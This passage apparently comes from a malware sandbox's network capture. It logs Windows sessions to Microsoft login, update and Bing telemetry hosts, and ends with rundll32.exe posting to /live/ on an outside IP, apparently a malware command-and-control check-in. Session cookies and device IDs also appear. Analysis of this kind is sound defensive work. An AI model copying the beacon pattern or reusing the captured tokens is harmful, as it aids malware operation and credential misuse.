                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                16192.168.2.54973140.126.28.23443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:15:26 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/soap+xml
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                Content-Length: 4775
                                                                                                Host: login.live.com
                                                                                                2024-04-26 21:15:26 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                2024-04-26 21:15:26 UTC569INHTTP/1.1 200 OK
                                                                                                Cache-Control: no-store, no-cache
                                                                                                Pragma: no-cache
                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                Expires: Fri, 26 Apr 2024 21:14:26 GMT
                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                x-ms-route-info: C511_SN1
                                                                                                x-ms-request-id: eba35b0b-f7cc-48b4-8869-fc70ddaa7f39
                                                                                                PPServer: PPV: 30 H: SN1PEPF0002F05D V: 0
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                Date: Fri, 26 Apr 2024 21:15:25 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 11393
                                                                                                2024-04-26 21:15:26 UTC11393INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                17192.168.2.54973452.165.165.26443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:15:26 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=rhgEMuw7VOs9VaZ&MD=8y7rrUUn HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                Host: slscr.update.microsoft.com
                                                                                                2024-04-26 21:15:27 UTC560INHTTP/1.1 200 OK
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                Content-Type: application/octet-stream
                                                                                                Expires: -1
                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                MS-CorrelationId: c27c82e2-f659-45a1-9739-785206ae3739
                                                                                                MS-RequestId: 2b6327df-02c3-420b-b0ea-80f8f98a9326
                                                                                                MS-CV: f7IaBxLOM06ZaUbR.0
                                                                                                X-Microsoft-SLSClientCache: 2880
                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Date: Fri, 26 Apr 2024 21:15:26 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 24490
                                                                                                2024-04-26 21:15:27 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                2024-04-26 21:15:27 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                18192.168.2.54973523.1.237.91443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:15:26 UTC2148OUTPOST /threshold/xls.aspx HTTP/1.1
                                                                                                Origin: https://www.bing.com
                                                                                                Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                Accept: */*
                                                                                                Accept-Language: en-CH
                                                                                                Content-type: text/xml
                                                                                                X-Agent-DeviceId: 01000A410900D492
                                                                                                X-BM-CBT: 1696428841
                                                                                                X-BM-DateFormat: dd/MM/yyyy
                                                                                                X-BM-DeviceDimensions: 784x984
                                                                                                X-BM-DeviceDimensionsLogical: 784x984
                                                                                                X-BM-DeviceScale: 100
                                                                                                X-BM-DTZ: 120
                                                                                                X-BM-Market: CH
                                                                                                X-BM-Theme: 000000;0078d7
                                                                                                X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
                                                                                                X-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22
                                                                                                X-Device-isOptin: false
                                                                                                X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                X-Device-OSSKU: 48
                                                                                                X-Device-Touch: false
                                                                                                X-DeviceID: 01000A410900D492
                                                                                                X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticsh
                                                                                                X-MSEdge-ExternalExpType: JointCoord
                                                                                                X-PositionerType: Desktop
                                                                                                X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                X-Search-CortanaAvailableCapabilities: None
                                                                                                X-Search-SafeSearch: Moderate
                                                                                                X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time
                                                                                                X-UserAgeClass: Unknown
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                Host: www.bing.com
                                                                                                Content-Length: 2484
                                                                                                Connection: Keep-Alive
                                                                                                Cache-Control: no-cache
                                                                                                Cookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1714166094970&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF
                                                                                                2024-04-26 21:15:26 UTC1OUTData Raw: 3c
                                                                                                Data Ascii: <
                                                                                                2024-04-26 21:15:26 UTC2483OUTData Raw: 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 33 36 34 34 46 44 37 34 44 46 31 36 36 31 38 46 30 38 46 37 45 43 30 33 44 45 35 35 36 30 30 31 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 37 35 32 32 38 31 35 36 37 30 33 41 34 30 44 35 42 39 37 45 35 41 36 38 33 36 46 32 41 31 43 45 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43 49
                                                                                                Data Ascii: ClientInstRequest><CID>3644FD74DF16618F08F7EC03DE556001</CID><Events><E><T>Event.ClientInst</T><IG>75228156703A40D5B97E5A6836F2A1CE</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"CI
                                                                                                2024-04-26 21:15:27 UTC480INHTTP/1.1 204 No Content
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                X-MSEdge-Ref: Ref A: A8CBD3DF30E64354BA608CE89960CE4F Ref B: LAX311000115007 Ref C: 2024-04-26T21:15:27Z
                                                                                                Date: Fri, 26 Apr 2024 21:15:27 GMT
                                                                                                Connection: close
                                                                                                Alt-Svc: h3=":443"; ma=93600
                                                                                                X-CDN-TraceID: 0.57ed0117.1714166127.13696855


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                19192.168.2.54973640.126.28.23443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:15:27 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/soap+xml
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                Content-Length: 4775
                                                                                                Host: login.live.com
                                                                                                2024-04-26 21:15:27 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                2024-04-26 21:15:27 UTC569INHTTP/1.1 200 OK
                                                                                                Cache-Control: no-store, no-cache
                                                                                                Pragma: no-cache
                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                Expires: Fri, 26 Apr 2024 21:14:27 GMT
                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                x-ms-route-info: C511_SN1
                                                                                                x-ms-request-id: e9e11725-9439-4a1a-ab56-39acd821c4a5
                                                                                                PPServer: PPV: 30 H: SN1PEPF0002F03C V: 0
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                Date: Fri, 26 Apr 2024 21:15:26 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 11393
                                                                                                2024-04-26 21:15:27 UTC11393INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                20192.168.2.54973840.126.28.23443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:15:30 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/soap+xml
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                Content-Length: 4717
                                                                                                Host: login.live.com
                                                                                                2024-04-26 21:15:30 UTC4717OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                2024-04-26 21:15:31 UTC569INHTTP/1.1 200 OK
                                                                                                Cache-Control: no-store, no-cache
                                                                                                Pragma: no-cache
                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                Expires: Fri, 26 Apr 2024 21:14:31 GMT
                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                x-ms-route-info: C511_SN1
                                                                                                x-ms-request-id: d172ca6e-4f62-4524-a75a-67ca8da5165a
                                                                                                PPServer: PPV: 30 H: SN1PEPF0002F0A3 V: 0
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                Date: Fri, 26 Apr 2024 21:15:31 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 10921
                                                                                                2024-04-26 21:15:31 UTC10921INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                21192.168.2.54974052.165.165.26443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:16:06 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=rhgEMuw7VOs9VaZ&MD=8y7rrUUn HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                Host: slscr.update.microsoft.com
                                                                                                2024-04-26 21:16:06 UTC560INHTTP/1.1 200 OK
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                Content-Type: application/octet-stream
                                                                                                Expires: -1
                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                                                MS-CorrelationId: 5ff47aae-c0a5-4a25-b4cd-7df33ccb5e98
                                                                                                MS-RequestId: 48e9e28f-0dea-4192-b52a-b2eafb9269aa
                                                                                                MS-CV: Ui5OsUe7FUWmZk2X.0
                                                                                                X-Microsoft-SLSClientCache: 2160
                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Date: Fri, 26 Apr 2024 21:16:05 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 25457
                                                                                                2024-04-26 21:16:06 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                                                                Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                                                                2024-04-26 21:16:06 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                                                                Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                22192.168.2.549745104.21.46.75443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:16:51 UTC229OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
